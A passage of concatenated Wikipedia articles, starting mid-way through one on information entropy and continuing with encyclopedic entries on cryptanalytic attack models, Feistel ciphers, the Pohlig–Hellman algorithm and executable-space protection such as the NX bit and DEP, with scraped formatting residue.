above will be improper. IfΔis some "standard" value ofx(i.e. "bin size") and therefore has the same units, then a modified differential entropy may be written in proper form as:H=∫−∞∞f(x)log⁡(f(x)Δ)dx,{\displaystyle \mathrm {H} =\int _{-\infty }^{\infty }f(x)\log(f(x)\,\Delta )\,dx,}and the result will be the same for any choice of units forx. In fact, the limit of discrete entropy asN→∞{\displaystyle N\rightarrow \infty }would also include a term oflog⁡(N){\displaystyle \log(N)}, which would in general be infinite. This is expected: continuous variables would typically have infinite entropy when discretized. Thelimiting density of discrete pointsis really a measure of how much easier a distribution is to describe than a distribution that is uniform over its quantization scheme. Another useful measure of entropy that works equally well in the discrete and the continuous case is therelative entropyof a distribution. It is defined as theKullback–Leibler divergencefrom the distribution to a reference measuremas follows. Assume that a probability distributionpisabsolutely continuouswith respect to a measurem, i.e. is of the formp(dx) =f(x)m(dx)for some non-negativem-integrable functionfwithm-integral 1, then the relative entropy can be defined asDKL(p‖m)=∫log⁡(f(x))p(dx)=∫f(x)log⁡(f(x))m(dx).{\displaystyle D_{\mathrm {KL} }(p\|m)=\int \log(f(x))p(dx)=\int f(x)\log(f(x))m(dx).} In this form the relative entropy generalizes (up to change in sign) both the discrete entropy, where the measuremis thecounting measure, and the differential entropy, where the measuremis theLebesgue measure. If the measuremis itself a probability distribution, the relative entropy is non-negative, and zero ifp=mas measures. It is defined for any measure space, hence coordinate independent and invariant under co-ordinate reparameterizations if one properly takes into account the transformation of the measurem. The relative entropy, and (implicitly) entropy and differential entropy, do depend on the "reference" measurem. Terence Taoused entropy to make a useful connection trying to solve theErdős discrepancy problem.[30][31] Intuitively the idea behind the proof was if there is low information in terms of the Shannon entropy between consecutive random variables (here the random variable is defined using theLiouville function(which is a useful mathematical function for studying distribution of primes)XH=λ(n+H){\displaystyle \lambda (n+H)}. And in an interval [n, n+H] the sum over that interval could become arbitrary large. For example, a sequence of +1's (which are values ofXHcould take) have trivially low entropy and their sum would become big. But the key insight was showing a reduction in entropy by non negligible amounts as one expands H leading inturn to unbounded growth of a mathematical object over this random variable is equivalent to showing the unbounded growth per theErdős discrepancy problem. The proof is quite involved and it brought together breakthroughs not just in novel use of Shannon entropy, but also it used theLiouville functionalong with averages of modulated multiplicative functions[32]in short intervals. Proving it also broke the "parity barrier"[33]for this specific problem. While the use of Shannon entropy in the proof is novel it is likely to open new research in this direction. Entropy has become a useful quantity incombinatorics. A simple example of this is an alternative proof of theLoomis–Whitney inequality: for every subsetA⊆Zd, we have|A|d−1≤∏i=1d|Pi(A)|{\displaystyle |A|^{d-1}\leq \prod _{i=1}^{d}|P_{i}(A)|}wherePiis theorthogonal projectionin theith coordinate:Pi(A)={(x1,…,xi−1,xi+1,…,xd):(x1,…,xd)∈A}.{\displaystyle P_{i}(A)=\{(x_{1},\ldots ,x_{i-1},x_{i+1},\ldots ,x_{d}):(x_{1},\ldots ,x_{d})\in A\}.} The proof follows as a simple corollary ofShearer's inequality: ifX1, ...,Xdare random variables andS1, ...,Snare subsets of{1, ...,d} such that every integer between 1 anddlies in exactlyrof these subsets, thenH[(X1,…,Xd)]≤1r∑i=1nH[(Xj)j∈Si]{\displaystyle \mathrm {H} [(X_{1},\ldots ,X_{d})]\leq {\frac {1}{r}}\sum _{i=1}^{n}\mathrm {H} [(X_{j})_{j\in S_{i}}]}where(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is the Cartesian product of random variablesXjwith indexesjinSi(so the dimension of this vector is equal to the size ofSi). We sketch how Loomis–Whitney follows from this: Indeed, letXbe a uniformly distributed random variable with values inAand so that each point inAoccurs with equal probability. Then (by the further properties of entropy mentioned above)Η(X) = log|A|, where|A|denotes the cardinality ofA. LetSi= {1, 2, ...,i−1,i+1, ...,d}. The range of(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is contained inPi(A)and henceH[(Xj)j∈Si]≤log⁡|Pi(A)|{\displaystyle \mathrm {H} [(X_{j})_{j\in S_{i}}]\leq \log |P_{i}(A)|}. Now use this to bound the right side of Shearer's inequality and exponentiate the opposite sides of the resulting inequality you obtain. For integers0 <k<nletq=k/n. Then2nH(q)n+1≤(nk)≤2nH(q),{\displaystyle {\frac {2^{n\mathrm {H} (q)}}{n+1}}\leq {\tbinom {n}{k}}\leq 2^{n\mathrm {H} (q)},}where[34]: 43H(q)=−qlog2⁡(q)−(1−q)log2⁡(1−q).{\displaystyle \mathrm {H} (q)=-q\log _{2}(q)-(1-q)\log _{2}(1-q).} ∑i=0n(ni)qi(1−q)n−i=(q+(1−q))n=1.{\displaystyle \sum _{i=0}^{n}{\tbinom {n}{i}}q^{i}(1-q)^{n-i}=(q+(1-q))^{n}=1.}Rearranging gives the upper bound. For the lower bound one first shows, using some algebra, that it is the largest term in the summation. But then,(nk)qqn(1−q)n−nq≥1n+1{\displaystyle {\binom {n}{k}}q^{qn}(1-q)^{n-nq}\geq {\frac {1}{n+1}}}since there aren+ 1terms in the summation. Rearranging gives the lower bound. A nice interpretation of this is that the number of binary strings of lengthnwith exactlykmany 1's is approximately2nH(k/n){\displaystyle 2^{n\mathrm {H} (k/n)}}.[35] Machine learningtechniques arise largely from statistics and also information theory. In general, entropy is a measure of uncertainty and the objective of machine learning is to minimize uncertainty. Decision tree learningalgorithms use relative entropy to determine the decision rules that govern the data at each node.[36]Theinformation gain in decision treesIG(Y,X){\displaystyle IG(Y,X)}, which is equal to the difference between the entropy ofY{\displaystyle Y}and the conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}, quantifies the expected information, or the reduction in entropy, from additionally knowing the value of an attributeX{\displaystyle X}. The information gain is used to identify which attributes of the dataset provide the most information and should be used to split the nodes of the tree optimally. Bayesian inferencemodels often apply theprinciple of maximum entropyto obtainprior probabilitydistributions.[37]The idea is that the distribution that best represents the current state of knowledge of a system is the one with the largest entropy, and is therefore suitable to be the prior. Classification in machine learningperformed bylogistic regressionorartificial neural networksoften employs a standard loss function, calledcross-entropyloss, that minimizes the average cross entropy between ground truth and predicted distributions.[38]In general, cross entropy is a measure of the differences between two datasets similar to the KL divergence (also known as relative entropy). This article incorporates material from Shannon's entropy onPlanetMath, which is licensed under theCreative Commons Attribution/Share-Alike License.
https://en.wikipedia.org/wiki/Entropy_(information_theory)
Incryptography, adistinguishing attackis any form ofcryptanalysison data encrypted by a cipher that allows an attacker to distinguish the encrypted data from random data.[1]Modernsymmetric-key ciphersare specifically designed to be immune to such an attack.[2]In other words, modern encryption schemes arepseudorandom permutationsand are designed to haveciphertext indistinguishability. If an algorithm is found that can distinguish the output from random faster than abrute force search, then that is considered a break of the cipher. A similar concept is theknown-key distinguishing attack, whereby an attacker knows the key and can find a structural property in the cipher, where the transformation from plaintext to ciphertext is not random.[3] To prove that a cryptographic function is safe, it is often compared to arandom oracle. If a function were a random oracle, then an attacker is not able to predict any of the output of the function. If a function is distinguishable from a random oracle, it has non-random properties. That is, there exists a relation between different outputs, or between input and output, which can be used by an attacker for example to find (a part of) the input. Example Let T be a sequence of random bits, generated by a random oracle and S be a sequence generated by apseudo-random bit generator. Two parties use one encryption system to encrypt a message M of length n as the bitwise XOR of M and the next n bits of T or S respectively. The output of the encryption using T is truly random. Now, if the sequence S cannot be distinguished from T, the output of the encryption with S will appear random as well. If the sequence S is distinguishable, then the encryption of M with S may reveal information of M. Two systems S and T are said to be indistinguishable if there exists no algorithm D, connected to either S or T, able to decide whether it is connected to S or T. A distinguishing attack is given by such an algorithm D. It is broadly an attack in which the attacker is given a black box containing either an instance of the system under attack with an unknown key, or a random object in the domain that the system aims to emulate, then if the algorithm is able to tell whether the system or the random object is in the black box, one has an attack. For example, a distinguishing attack on astream ciphersuch asRC4might be one that determines whether a given stream of bytes is random or generated by RC4 with an unknown key. Classic examples of distinguishing attack on a popular stream cipher was byItsik MantinandAdi Shamirwho showed that the 2nd output byte of RC4 was heavily biased toward zero.[4]In another example,Souradyuti PaulandBart PreneelofCOSIChave shown that the XOR value of the 1st and 2nd outputs ofRC4is also non-uniform. Significantly, both the above theoretical biases can be demonstrable through computer simulation.[5]
https://en.wikipedia.org/wiki/Distinguishing_attack
Incryptography, aFeistel cipher(also known asLuby–Rackoff block cipher) is asymmetric structureused in the construction ofblock ciphers, named after theGerman-bornphysicistand cryptographerHorst Feistel, who did pioneering research while working forIBM; it is also commonly known as aFeistel network. A large number ofblock ciphersuse the scheme, including the USData Encryption Standard, the Soviet/RussianGOSTand the more recentBlowfishandTwofishciphers. In a Feistel cipher, encryption and decryption are very similar operations, and both consist of iteratively running a function called a "round function" a fixed number of times. Many modern symmetric block ciphers are based on Feistel networks. Feistel networks were first seen commercially in IBM'sLucifercipher, designed byHorst FeistelandDon Coppersmithin 1973. Feistel networks gained respectability when the U.S. Federal Government adopted theDES(a cipher based on Lucifer, with changes made by theNSA) in 1976. Like other components of the DES, the iterative nature of the Feistel construction makes implementing the cryptosystem in hardware easier (particularly on the hardware available at the time of DES's design). A Feistel network uses around function, a function which takes two inputs – a data block and a subkey – and returns one output of the same size as the data block.[1]In each round, the round function is run on half of the data to be encrypted, and its output is XORed with the other half of the data. This is repeated a fixed number of times, and the final output is the encrypted data. An important advantage of Feistel networks compared to other cipher designs such assubstitution–permutation networksis that the entire operation is guaranteed to be invertible (that is, encrypted data can be decrypted), even if the round function is not itself invertible. The round function can be made arbitrarily complicated, since it does not need to be designed to be invertible.[2]: 465[3]: 347Furthermore, theencryptionanddecryptionoperations are very similar, even identical in some cases, requiring only a reversal of thekey schedule. Therefore, the size of the code or circuitry required to implement such a cipher is nearly halved. Unlike substitution-permutation networks, Feistel networks also do not depend on a substitution box that could cause timing side-channels in software implementations. The structure and properties of Feistel ciphers have been extensively analyzed bycryptographers. Michael LubyandCharles Rackoffanalyzed the Feistel cipher construction and proved that if the round function is a cryptographically securepseudorandom function, withKiused as the seed, then 3 rounds are sufficient to make the block cipher apseudorandom permutation, while 4 rounds are sufficient to make it a "strong" pseudorandom permutation (which means that it remains pseudorandom even to an adversary who getsoracleaccess to its inverse permutation).[4]Because of this very important result of Luby and Rackoff, Feistel ciphers are sometimes called Luby–Rackoff block ciphers. Further theoretical work has generalized the construction somewhat and given more precise bounds for security.[5][6] LetF{\displaystyle \mathrm {F} }be the round function and letK0,K1,…,Kn{\displaystyle K_{0},K_{1},\ldots ,K_{n}}be the sub-keys for the rounds0,1,…,n{\displaystyle 0,1,\ldots ,n}respectively. Then the basic operation is as follows: Split the plaintext block into two equal pieces: (L0{\displaystyle L_{0}},R0{\displaystyle R_{0}}). For each roundi=0,1,…,n{\displaystyle i=0,1,\dots ,n}, compute where⊕{\displaystyle \oplus }meansXOR. Then the ciphertext is(Rn+1,Ln+1){\displaystyle (R_{n+1},L_{n+1})}. Decryption of a ciphertext(Rn+1,Ln+1){\displaystyle (R_{n+1},L_{n+1})}is accomplished by computing fori=n,n−1,…,0{\displaystyle i=n,n-1,\ldots ,0} Then(L0,R0){\displaystyle (L_{0},R_{0})}is the plaintext again. The diagram illustrates both encryption and decryption. Note the reversal of the subkey order for decryption; this is the only difference between encryption and decryption. Unbalanced Feistel ciphers use a modified structure whereL0{\displaystyle L_{0}}andR0{\displaystyle R_{0}}are not of equal lengths.[7]TheSkipjackcipher is an example of such a cipher. TheTexas Instrumentsdigital signature transponderuses a proprietary unbalanced Feistel cipher to performchallenge–response authentication.[8] TheThorp shuffleis an extreme case of an unbalanced Feistel cipher in which one side is a single bit. This has better provable security than a balanced Feistel cipher but requires more rounds.[9] The Feistel construction is also used in cryptographic algorithms other than block ciphers. For example, theoptimal asymmetric encryption padding(OAEP) scheme uses a simple Feistel network to randomize ciphertexts in certainasymmetric-key encryptionschemes. A generalized Feistel algorithm can be used to create strong permutations on small domains of size not a power of two (seeformat-preserving encryption).[9] Whether the entire cipher is a Feistel cipher or not, Feistel-like networks can be used as a component of a cipher's design. For example,MISTY1is a Feistel cipher using a three-round Feistel network in its round function,Skipjackis a modified Feistel cipher using a Feistel network in its G permutation, andThreefish(part ofSkein) is a non-Feistel block cipher that uses a Feistel-like MIX function. Feistel or modified Feistel: Generalised Feistel:
https://en.wikipedia.org/wiki/Feistel_network
Incomputer science, anonline algorithmmeasures itscompetitivenessagainst differentadversary models. For deterministic algorithms, the adversary is the same as the adaptive offline adversary. For randomized online algorithms competitiveness can depend upon theadversary modelused. The three common adversaries are the oblivious adversary, the adaptive online adversary, and the adaptive offline adversary. Theoblivious adversaryis sometimes referred to as the weak adversary. This adversary knows the algorithm's code, but does not get to know the randomized results of the algorithm. Theadaptive online adversaryis sometimes called the medium adversary. This adversary must make its own decision before it is allowed to know the decision of the algorithm. Theadaptive offline adversaryis sometimes called the strong adversary. This adversary knows everything, even the random number generator. This adversary is so strong that randomization does not help against it. From S. Ben-David,A. Borodin,R. Karp,G. Tardos,A. Wigdersonwe have:
https://en.wikipedia.org/wiki/Adversarial_model#Existential_forgery
Achosen-plaintext attack(CPA) is anattack modelforcryptanalysiswhich presumes that the attacker can obtain theciphertextsfor arbitraryplaintexts.[1]The goal of the attack is to gain information that reduces the security of theencryptionscheme.[2] Modern ciphers aim to provide semantic security, also known asciphertext indistinguishability under chosen-plaintext attack, and they are therefore, by design, generally immune to chosen-plaintext attacks if correctly implemented. In a chosen-plaintext attack theadversarycan (possiblyadaptively) ask for the ciphertexts of arbitrary plaintext messages. This is formalized by allowing the adversary to interact with an encryptionoracle, viewed as ablack box. The attacker’s goal is to reveal all or a part of the secret encryption key. It may seem infeasible in practice that an attacker could obtain ciphertexts for given plaintexts. However, modern cryptography is implemented in software or hardware and is used for a diverse range of applications; for many cases, a chosen-plaintext attack is often very feasible (see alsoIn practice). Chosen-plaintext attacks become extremely important in the context ofpublic key cryptographywhere the encryption key is public and so attackers can encrypt any plaintext they choose. There are two forms of chosen-plaintext attacks: A general batch chosen-plaintext attack is carried out as follows[failed verification]: Consider the following extension of the above situation. After the last step, A cipher hasindistinguishable encryptions under a chosen-plaintext attackif after running the above experiment the adversary can't guess correctly (b=b') with probability non-negligiblybetter than 1/2.[3] The following examples demonstrate how some ciphers that meet other security definitions may be broken with a chosen-plaintext attack. The following attack on theCaesar cipherallows full recovery of the secret key: With more intricate or complex encryption methodologies the decryption method becomes more resource-intensive, however, the core concept is still relatively the same. The following attack on aone-time padallows full recovery of the secret key. Suppose the message length and key length are equal ton. While the one-time pad is used as an example of aninformation-theoretically securecryptosystem, this security only holds under security definitions weaker than CPA security. This is because under the formal definition of CPA security the encryption oracle has no state. This vulnerability may not be applicable to all practical implementations – the one-time pad can still be made secure if key reuse is avoided (hence the name "one-time" pad). InWorld War IIUS Navy cryptanalysts discovered that Japan was planning to attack a location referred to as "AF". They believed that "AF" might beMidway Island, because other locations in theHawaiian Islandshad codewords that began with "A". To prove their hypothesis that "AF" corresponded to "Midway Island" they asked the US forces at Midway to send a plaintext message about low supplies. The Japanese intercepted the message and immediately reported to their superiors that "AF" was low on water, confirming the Navy's hypothesis and allowing them to position their force to win thebattle.[3][4] Also duringWorld War II, Allied codebreakers atBletchley Parkwould sometimes ask theRoyal Air Forceto lay mines at a position that didn't have any abbreviations or alternatives in the German naval system's grid reference. The hope was that the Germans, seeing the mines, would use anEnigma machineto encrypt a warning message about the mines and an "all clear" message after they were removed, giving the allies enough information about the message to break the German naval Enigma. This process ofplantinga known-plaintext was calledgardening.[5]Allied codebreakers also helped craft messages sent by double agentJuan Pujol García, whose encrypted radio reports were received in Madrid, manually decrypted, and then re-encrypted with anEnigma machinefor transmission to Berlin.[6]This helped the codebreakers decrypt the code used on the second leg, having supplied the originaltext.[7] In modern day, chosen-plaintext attacks (CPAs) are often used to breaksymmetric ciphers. To be considered CPA-secure, the symmetric cipher must not be vulnerable to chosen-plaintext attacks. Thus, it is important for symmetric cipher implementors to understand how an attacker would attempt to break their cipher and make relevant improvements. For some chosen-plaintext attacks, only a small part of the plaintext may need to be chosen by the attacker; such attacks are known as plaintext injection attacks. A chosen-plaintext attack is more powerful thanknown-plaintext attack, because the attacker can directly target specific terms or patterns without having to wait for these to appear naturally, allowing faster gathering of data relevant to cryptanalysis. Therefore, any cipher that prevents chosen-plaintext attacks is also secure againstknown-plaintextandciphertext-onlyattacks. However, a chosen-plaintext attack is less powerful than achosen-ciphertext attack, where the attacker can obtain the plaintexts of arbitrary ciphertexts. A CCA-attacker can sometimes break a CPA-secure system.[3]For example, theEl Gamal cipheris secure against chosen plaintext attacks, but vulnerable to chosen ciphertext attacks because it isunconditionally malleable.
https://en.wikipedia.org/wiki/Chosen-plaintext_attack
Akey-recovery attackis an adversary's attempt to recover thecryptographic keyof an encryption scheme. Normally this means that the attacker has a pair, or more than one pair, ofplaintextmessage and the correspondingciphertext.[1]: 52Historically, cryptanalysis of block ciphers has focused on key-recovery, but security against these sorts of attacks is a very weak guarantee since it may not be necessary to recover the key to obtain partial information about the message or decrypt message entirely.[1]: 52Modern cryptography uses more robust notions of security. Recently,indistinguishability under adaptive chosen-ciphertext attack(IND-CCA2 security) has become the "golden standard" of security.[2]: 566The most obvious key-recovery attack is theexhaustive key-searchattack. But modern ciphers often have a key space of size2128{\displaystyle 2^{128}}or greater, making such attacks infeasible with current technology. Incryptography, thekey-recovery advantage(KR advantage) of a particularalgorithmis a measure of how effective an algorithm can mount a key-recovery attack. Consequently, the maximum key-recovery advantage attainable by any algorithm with a fixed amount ofcomputational resourcesis a measure of how difficult it is to recover acipher'skey. It is defined as the probability that the adversary algorithm can guess a cipher's randomly selected key, given a fixed amount of computational resources.[3]An extremely low KR advantage is essential for an encryption scheme'ssecurity. This cryptography-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Key_recovery_attack
Ingroup theory, thePohlig–Hellman algorithm, sometimes credited as theSilver–Pohlig–Hellman algorithm,[1]is a special-purposealgorithmfor computingdiscrete logarithmsin afinite abelian groupwhose order is asmooth integer. The algorithm was introduced by Roland Silver, but first published byStephen PohligandMartin Hellman, who credit Silver with its earlier independent but unpublished discovery. Pohlig and Hellman also list Richard Schroeppel and H. Block as having found the same algorithm, later than Silver, but again without publishing it.[2] As an important special case, which is used as a subroutine in the general algorithm (see below), the Pohlig–Hellman algorithm applies togroupswhose order is aprime power. The basic idea of this algorithm is to iteratively compute thep{\displaystyle p}-adic digits of the logarithm by repeatedly "shifting out" all but one unknown digit in the exponent, and computing that digit by elementary methods. (Note that for readability, the algorithm is stated for cyclic groups — in general,G{\displaystyle G}must be replaced by the subgroup⟨g⟩{\displaystyle \langle g\rangle }generated byg{\displaystyle g}, which is always cyclic.) The algorithm computes discrete logarithms in time complexityO(ep){\displaystyle O(e{\sqrt {p}})}, far better than thebaby-step giant-step algorithm'sO(pe){\displaystyle O({\sqrt {p^{e}}})}whene{\displaystyle e}is large. In this section, we present the general case of the Pohlig–Hellman algorithm. The core ingredients are the algorithm from the previous section (to compute a logarithm modulo each prime power in the group order) and theChinese remainder theorem(to combine these to a logarithm in the full group). (Again, we assume the group to be cyclic, with the understanding that a non-cyclic group must be replaced by the subgroup generated by the logarithm's base element.) The correctness of this algorithm can be verified via theclassification of finite abelian groups: Raisingg{\displaystyle g}andh{\displaystyle h}to the power ofn/piei{\displaystyle n/p_{i}^{e_{i}}}can be understood as the projection to the factor group of orderpiei{\displaystyle p_{i}^{e_{i}}}. The worst-case input for the Pohlig–Hellman algorithm is a group of prime order: In that case, it degrades to thebaby-step giant-step algorithm, hence the worst-case time complexity isO(n){\displaystyle {\mathcal {O}}({\sqrt {n}})}. However, it is much more efficient if the order is smooth: Specifically, if∏ipiei{\displaystyle \prod _{i}p_{i}^{e_{i}}}is the prime factorization ofn{\displaystyle n}, then the algorithm's complexity isO(∑iei(log⁡n+pi)){\displaystyle {\mathcal {O}}\left(\sum _{i}{e_{i}(\log n+{\sqrt {p_{i}}})}\right)}group operations.[3]
https://en.wikipedia.org/wiki/Pohlig%E2%80%93Hellman_algorithm
Incomputer security,executable-space protectionmarksmemoryregions as non-executable, such that an attempt to executemachine codein these regions will cause anexception. It relies on hardware features such as theNX bit(no-execute bit), or on software emulation when hardware support is unavailable. Software emulation often introduces a performance cost, oroverhead(extra processing time or resources), while hardware-based NX bit implementations have no measurable performance impact. Early systems like theBurroughs 5000, introduced in 1961, implemented executable-space protection using atagged architecture(memory tagging to distinguish code from data), a precursor to modern NX bit technology. Today, operating systems use executable-space protection to mark writable memory areas, such as thestackandheap, as non-executable, helping to preventbuffer overflowexploits. These attacks rely on some part of memory, usually the stack, being both writable and executable; if it is not, the attack fails. Many operating systems implement or have an available executable space protection policy. Here is a list of such systems in alphabetical order, each with technologies ordered from newest to oldest. A technology supplying Architecture Independentemulationwill be functional on all processors which aren't hardware supported. The "Other Supported" line is for processors which allow some grey-area method, where an explicit NX bit doesn't exist yet hardware allows one to be emulated in some way. As ofAndroid2.3 and later, architectures which support it have non-executable pages by default, including non-executable stack and heap.[1][2][3] Initial support for theNX bit, onx86-64andIA-32processors that support it, first appeared inFreeBSD-CURRENT on June 8, 2004. It has been in FreeBSD releases since the 5.3 release. TheLinux kernelsupports the NX bit onx86-64andIA-32processors that support it, such as modern 64-bit processors made by AMD, Intel, Transmeta and VIA. The support for this feature in the 64-bit mode on x86-64 CPUs was added in 2004 byAndi Kleen, and later the same year,Ingo Molnáradded support for it in 32-bit mode on 64-bit CPUs. These features have been part of theLinux kernel mainlinesince the release of kernel version 2.6.8 in August 2004.[4] The availability of the NX bit on 32-bit x86 kernels, which may run on both 32-bit x86 CPUs and 64-bit IA-32-compatible CPUs, is significant because a 32-bit x86 kernel would not normally expect the NX bit that anAMD64orIA-64supplies; the NX enabler patch assures that these kernels will attempt to use the NX bit if present. Some desktopLinux distributions, such asFedora,UbuntuandopenSUSE, do not enable the HIGHMEM64 option by default in their default kernels, which is required to gain access to the NX bit in 32-bit mode, because thePAEmode that is required to use the NX bit causes boot failures on pre-Pentium Pro(including Pentium MMX) andCeleron MandPentium Mprocessors without NX support. Other processors that do not support PAE areAMD K6and earlier,Transmeta Crusoe,VIA C3and earlier, andGeodeGX and LX.VMware Workstationversions older than 4.0,Parallels Workstationversions older than 4.0, andMicrosoft Virtual PCandVirtual Serverdo not support PAE on the guest. Fedora Core 6 and Ubuntu 9.10 and later provide a kernel-PAE package which supports PAE and NX. NX memory protection has always been available in Ubuntu for any systems that had the hardware to support it and ran the 64-bit kernel or the 32-bit server kernel. The 32-bit PAE desktop kernel (linux-image-generic-pae) in Ubuntu 9.10 and later, also provides the PAE mode needed for hardware with the NX CPU feature. For systems that lack NX hardware, the 32-bit kernels now provide an approximation of the NX CPU feature via software emulation that can help block many exploits an attacker might run from stack or heap memory. Non-execute functionality has also been present for other non-x86 processors supporting this functionality for many releases. Red Hatkernel developerIngo Molnárreleased a Linux kernel patch namedExec Shieldto approximate and utilize NX functionality on32-bitx86 CPUs. The Exec Shield patch was released to theLinux kernel mailing liston May 2, 2003, but was rejected for merging with the base kernel because it involved some intrusive changes to core code in order to handle the complex parts of the emulation. Exec Shield's legacy CPU support approximates NX emulation by tracking the upper code segment limit. This imposes only a few cycles of overhead during context switches, which is for all intents and purposes immeasurable. For legacy CPUs without an NX bit, Exec Shield fails to protect pages below the code segment limit; an mprotect() call to mark higher memory, such as the stack, executable will mark all memory below that limit executable as well. Thus, in these situations, Exec Shield's schemes fails. This is the cost of Exec Shield's low overhead. Exec Shield checks for twoELFheader markings, which dictate whether the stack or heap needs to be executable. These are called PT_GNU_STACK and PT_GNU_HEAP respectively. Exec Shield allows these controls to be set for both binary executables and for libraries; if an executable loads a library requiring a given restriction relaxed, the executable will inherit that marking and have that restriction relaxed. The PaX NX technology can emulate NX functionality, or use a hardware NX bit. PaX works on x86 CPUs that do not have the NX bit, such as 32-bit x86. The Linuxkernelstill does not ship with PaX (as of May, 2007); the patch must be merged manually. PaX provides two methods of NX bit emulation, called SEGMEXEC and PAGEEXEC. The SEGMEXEC method imposes a measurable but low overhead, typically less than 1%, which is a constant scalar incurred due to the virtual memory mirroring used for the separation between execution and data accesses.[5]SEGMEXEC also has the effect of halving the task's virtual address space, allowing the task to access less memory than it normally could. This is not a problem until the task requires access to more than half the normal address space, which is rare. SEGMEXEC does not cause programs to use more system memory (i.e. RAM), it only restricts how much they can access. On 32-bit CPUs, this becomes 1.5 GB rather than 3 GB. PaX supplies a method similar to Exec Shield's approximation in the PAGEEXEC as a speedup; however, when higher memory is marked executable, this method loses its protections. In these cases, PaX falls back to the older, variable-overhead method used by PAGEEXEC to protect pages below the CS limit, which may become quite a high-overhead operation in certainmemory access patterns. When the PAGEEXEC method is used on a CPU supplying a hardware NX bit, the hardware NX bit is used, thus no significant overhead is incurred. PaX supplies mprotect() restrictions to prevent programs from marking memory in ways that produce memory useful for a potentialexploit. This policy causes certain applications to cease to function, but it can be disabled for affected programs. PaX allows individual control over the following functions of the technology for each binary executable: PaX ignores both PT_GNU_STACK and PT_GNU_HEAP. In the past, PaX had a configuration option to honor these settings but that option has been removed for security reasons, as it was deemed not useful. The same results of PT_GNU_STACK can normally be attained by disabling mprotect() restrictions, as the program will normally mprotect() the stack on load. This may not always be true; for situations where this fails, simply disabling both PAGEEXEC and SEGMEXEC will effectively remove all executable space restrictions, giving the task the same protections on its executable space as a non-PaX system. macOSfor Intel supports the NX bit on all CPUs supported by Apple (from Mac OS X 10.4.4 – the first Intel release – onwards). Mac OS X 10.4 only supported NX stack protection. In Mac OS X 10.5, all 64-bit executables have NX stack and heap; W^X protection. This includesx86-64(Core 2 or later) and 64-bitPowerPCon theG5Macs. As ofNetBSD2.0 and later (December 9, 2004), architectures which support it have non-executable stack and heap.[6] Architectures that have per-page granularity consist of:alpha,amd64,hppa,i386(withPAE),powerpc(ibm4xx),sh5,sparc(sun4m,sun4d), sparc64. Architectures that can only support these with region granularity are: i386 (without PAE), other powerpc (such as macppc). Other architectures do not benefit from non-executable stack or heap; NetBSD does not by default use any software emulation to offer these features on those architectures. A technology in theOpenBSDoperating system, known as W^X, marks writable pages by default as non-executable on processors that support that. On 32-bitx86processors, the code segment is set to include only part of the address space, to provide some level of executable space protection. OpenBSD 3.3 shipped May 1, 2003, and was the first to include W^X. Solarishas supported globally disabling stack execution on SPARC processors since Solaris 2.6 (1997); in Solaris 9 (2002), support for disabling stack execution on a per-executable basis was added. The first implementation of a non-executable stack for Windows (NT 4.0, 2000 and XP) was published by SecureWave via their SecureStack product in 2001, based on the work of PaX.[7][8] Starting withWindows XPService Pack2 (2004) andWindows Server 2003Service Pack 1 (2005), the NX features were implemented for the first time on thex86architecture. Executable space protection on Windows is called "Data Execution Prevention" (DEP). Under Windows XP or Server 2003 NX protection was used on criticalWindows servicesexclusively by default. If thex86processor supported this feature in hardware, then the NX features were turned on automatically in Windows XP/Server 2003 by default. If the feature was not supported by the x86 processor, then no protection was given. Early implementations of DEP provided noaddress space layout randomization(ASLR), which allowed potentialreturn-to-libc attacksthat could have been feasibly used to disable DEP during an attack.[9]ThePaXdocumentation elaborates on why ASLR is necessary;[10]a proof-of-concept was produced detailing a method by which DEP could be circumvented in the absence of ASLR.[11]It may be possible to develop a successful attack if the address of prepared data such as corrupted images orMP3scan be known by the attacker. Microsoft added ASLR functionality inWindows VistaandWindows Server 2008. On this platform, DEP is implemented through the automatic use ofPAEkernelin 32-bit Windows and the native support on 64-bit kernels. Windows Vista DEP works by marking certain parts of memory as being intended to hold only data, which the NX or XD bit enabled processor then understands as non-executable.[12]In Windows, from version Vista, whether DEP is enabled or disabled for a particular process can be viewed on theProcesses/Detailstab in theWindows Task Manager. Windows implements software DEP (without the use of theNX bit) through Microsoft's "SafeStructured Exception Handling" (SafeSEH). For properly compiled applications, SafeSEH checks that, when an exception is raised during program execution, the exception's handler is one defined by the application as it was originally compiled. The effect of this protection is that an attacker is not able to add his own exception handler which he has stored in a data page through unchecked program input.[12][13] When NX is supported, it is enabled by default. Windows allows programs to control which pages disallow execution through itsAPIas well as through the section headers in aPE file. In the API, runtime access to the NX bit is exposed through theWin32API callsVirtualAlloc[Ex]andVirtualProtect[Ex]. Each page may be individually flagged as executable or non-executable. Despite the lack of previous x86 hardware support, both executable and non-executable page settings have been provided since the beginning. On pre-NX CPUs, the presence of the 'executable' attribute has no effect. It was documented as if it did function, and, as a result, most programmers used it properly. In the PE file format, each section can specify its executability. The execution flag has existed since the beginning of the format and standardlinkershave always used this flag correctly, even long before the NX bit. Because of this, Windows is able to enforce the NX bit on old programs. Assuming the programmer complied with "best practices", applications should work correctly now that NX is actually enforced. Only in a few cases have there been problems; Microsoft's own .NET Runtime had problems with the NX bit and was updated. In Microsoft'sXbox, although the CPU does not have the NX bit, newer versions of theXDKset the code segment limit to the beginning of the kernel's.datasection (no code should be after this point in normal circumstances). Starting with version 51xx, this change was also implemented into the kernel of new Xboxes. This broke the techniques old exploits used to become aterminate-and-stay-resident program. However, new exploits were quickly released supporting this new kernel version because the fundamental vulnerability in the Xbox kernel was unaffected. Where code is written and executed at runtime—aJIT compileris a prominent example—the compiler can potentially be used to produce exploit code (e.g. usingJIT Spray) that has been flagged for execution and therefore would not be trapped.[14][15] Return-oriented programmingcan allow an attacker to execute arbitrary code even when executable space protection is enforced.
https://en.wikipedia.org/wiki/Data_Execution_Prevention
